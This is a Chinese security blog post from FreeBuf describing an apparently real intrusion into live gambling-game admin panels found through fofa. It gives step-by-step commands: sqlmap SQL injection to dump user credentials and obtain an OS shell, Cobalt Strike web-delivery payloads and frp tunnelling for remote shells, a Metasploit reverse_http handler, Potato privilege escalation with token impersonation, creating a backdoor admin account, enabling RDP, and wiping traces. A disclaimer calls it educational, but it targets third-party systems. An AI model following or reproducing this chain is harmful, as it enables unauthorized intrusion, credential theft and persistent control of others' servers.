freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

frp过来cs上线一起打牌吧
2020-10-18 12:42:16

免责声明:本文提及的安全环境、工具和方法等仅供试用及教学用途,禁止非法使用,请与24小时内删除!

前期准备

  • 搭建cs4.0

首先下载,cs4.0的安装包,然后把包上传到自己的服务器上面,我这里演示使用的是阿里云把包上传服务器上面解压

1602994911_5f8bc2df0fb770a856d20.png!small

刚解压的文件,可能没有执行权限,需要给执行文件teamserver增加权限:chmod 777 teamserver

然后我们就可以启动cs,在解压后的目录下:执行

./teamserver 阿里云服务器ip 密码

返回这样就是启动成功了,服务端就搭建好了

1602994935_5f8bc2f73082302adbd32.png!small

可以在自己的电脑,或者虚拟机上面执行bat文件(win)就可以了

1602994952_5f8bc308cf9d2eca2dfc0.png!small

双击输入参数,点击连接

1602994968_5f8bc31812d1e9e20a8fa.png!small

然后就可以多人运动,进入游戏了

1602994974_5f8bc31eded95c63195f9.png!small

在这次测试中,需要在监听器修改一下参数

1602994986_5f8bc32a2e251fecb2138.png!small

Add一个,随便写个名字,选中foreign HTTP模式,填写host:阿里云服务器。端口:4444  —— Save

1602995000_5f8bc3389e32911079aa6.png!small

  • frp内网穿透

下载frp压缩包,上传服务器,解压

1602995019_5f8bc34b6acd0daf7c9a3.png!small

然后修改frps.ini里面的配置信息:vi frps.ini

我这边用端口4444

1602995045_5f8bc36529ef534fd1c7a.png!small

然后用命令:

./frps -c frps.ini   //启动frp

1602995113_5f8bc3a9dd982fe21b6ad.png!small

在kali里面配置frpc.ini

1602995123_5f8bc3b321230e92752d5.png!small

然后启动客户端

./frps -c frps.ini

frp后台启动命令

服务端: nohup ./frps -c frps.ini >/dev/null 2>&1 &

客户端: nohup ./frpc -c frpc.ini >/dev/null 2>&1 &

说明:>/dev/null 2>&1 &,表示丢弃。

准备完了,开搞~

手把手拿下shell

首先信息收集一波确认目标:fofa:body="qipai后台管理系统" && title=="后台登录"

这里用拼音代替敏感词

打开链接后台页面是这样的

1602995151_5f8bc3cfb2562e693c054.png!small

单刀直入,不绕坑,工具人肯定是直接使用工具的撒,随便输入账号密码直接抓包

1602995166_5f8bc3de61ced8d357ac0.png!small

把数据包保存下来txt

1602995174_5f8bc3e6d17a6266a9bbb.png!small

然后sqlmap直接跑 当时是没有截图,人家的sqlmap是用来跑的,我的sqlmap是用来爬的,龟速,直接帖命令加结果

sqlmap -r post.txt --dbs     //跑数据库名

知道管理在RYPlatformManagerDB数据库中(当时没截图,只是把跑出来的数据贴出了文档)

1602995198_5f8bc3fe55cea716f81f8.png!small

继续

sqlmap -r post.txt -D RYPlatformManagerDB --tables     //跑表名

1602995215_5f8bc40f1a66217075719.png!small

猜测数据存放在表dbo.Base_Users中(当时龟速跑了好几个表才知道)

sqlmap -r post.txt -D RYPlatformManagerDB -T dbo.Base_Users --columns    //跑字段名

当时我是没有跑字段名,直接把整个表给打印出来

sqlmap -r post.txt -D RYPlatformManagerDB -T dbo.Base_Users --dump

1602995250_5f8bc4326d9926f06670e.png!small

跑出来的Password是MD5加密过的,去查询了一下解密是收费的。花钱是不可能花钱的,直接给大佬口算(给有钱的大佬去解密)

1602995263_5f8bc43f57afa0f479431.png!small

得到结果后,直接使用账号密码,成功登录后台(听说有些后台没有怎么处理,能使用弱密码123456直接登,后来我也遇到过一个)

登录进入后台的页面

1602995282_5f8bc452cf65d9d43d419.png!small

大概看了一下,没思路,机器人比真人还要多的,确定还要玩这样的游戏??

以为这样就结束了吗,答案是不可能

前面知道在后台管理登录页面存在sql注入,那么在sqlmap里面有这么一个参数:--os-shell   获得交互式操作系统的shell

sqlmap -r -post.txt –os-shell

1602995317_5f8bc47556c3ba5b1ac4f.png!small然后现在在这里用到了前期搭建的cs4.0来上线

在多人运动游戏里面选择攻击-钓鱼-scripted WEB Delivery

1602995333_5f8bc485210b2745e7514.png!small

然后会弹窗,把ps命令复制粘贴到kali里面的os-shell执行上线即可

1602995344_5f8bc490da4cba4529da7.png!small

上线后可以看到

1602995353_5f8bc49912d22ce0ed41b.png!small

然后选中会话右键-目标文件管理/其他操作(自己去尝试)

1602995364_5f8bc4a41a71f5542e74b.png!small

文件管理这边可以进行一下操作,但是权限不大

1602995372_5f8bc4ac16fedb3ae6479.png!small

在cs里也能进行一些操作,但是太菜了,还是直接连msf把。利用跟前面搭建好的frp内网穿透,来实现。把服务端跟客户端的frp都启动,确保连接上了之后。在kali终端里执行

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_http   //这里一定是http

set LHOST 127.0.0.1  //这里是监听本地地址即可

set LPORT 1234   //端口需要跟前面frp配置的端口对应

run

执行完之后,在cs上面,多add一个监听器,配置如下

1602995400_5f8bc4c8867bf3f614981.png!small

然后在刚上线的服务器。右键增加会话-选择杠添加的会话

1602995415_5f8bc4d7740acf22814b0.png!small

返回kali稍微等一下,连接成功即可

1602995423_5f8bc4df31420495b558f.png!small

现在msf能成功连接上,操作性就更多了,直接进去查看发现权限是很低的

1602995434_5f8bc4ea91296f2e1b0d7.png!small

然后接下来提权

这边用到了土豆提权

meterpreter > upload  /root/potato.exe C:\\Users\\Public     //上传文件

meterpreter > cd C:\\Users\\Public   //切换路径

meterpreter > use incognito

meterpreter > list_tokens -u  //查看当前令牌信息

meterpreter > execute -cH -f ./potato.exe   /运行文件

meterpreter > list_tokens -u

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"   //切换高权限的令牌,不一定是这个,自己看执行文件后列出的令牌信息

meterpreter > getuid   //查看是否成功切换了

在msf中上传文件到C盘user的公共目录下

1602995502_5f8bc52e8b5d0faa1e5a7.png!small

然后打开文件

1602995529_5f8bc54949e457809158d.png!small

继续提权,查看当前的权限情况,这边可以看到权限是很小的

1602995541_5f8bc555a4e9aa5363873.png!small

执行上传的文件,在查看一下令牌信息(命令:meterpreter > execute -cH -f ./potato.exe   /运行文件,没截到)

1602995551_5f8bc55f1393e3aa0ec5c.png!small

然后窃取权限比较高的令牌,然后再看一下当前的权限情况

1602995566_5f8bc56e4798cc01e7632.png!small

现在已经窃取成功,那么直接shell进去看看(乱码的话这里可以用chcp 65001修正)

1602995573_5f8bc575ae4b1d78acb40.png!small

然后先创建个用户,提升为管理员权限

1602995583_5f8bc57fcf4acd63b93f0.png!small

查看一下有没有开放3389(然而并没有)

1602995591_5f8bc58703b9acb9cccf1.png!small

他没开,自己给他开一个就好了,直接连上,成功登录

1602995597_5f8bc58d7a3e8b39e166e.png!small

最后看到这服务器的配置,我承认我酸了

1602995606_5f8bc596149c52ebd314e.png!small

最后把清理战场(清除痕迹),关机走人

总结:前期通过sqlmap去爬,然后用CS去生成链接丢去sqlmap里面执行上线,通过frp内网穿透,把CS上线的shell传给kali里面的msf继续操作,然后用到烂土豆去提权,(MS16-075)。文章已经做到尽可能详细了,有疑问可以后台给我留言一起啊交流哦!文章写得有点乱,见怪莫怪哈,看完相信会有所收获~

最后把文中使用到的工具打包,在公众号“Tools杂货铺”回复:打牌  获取下载链接

免责声明:本文提及的安全环境、工具和方法等仅供试用及教学用途,禁止非法使用,请与24小时内删除!

# 灰产圈 # frp # 打牌
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者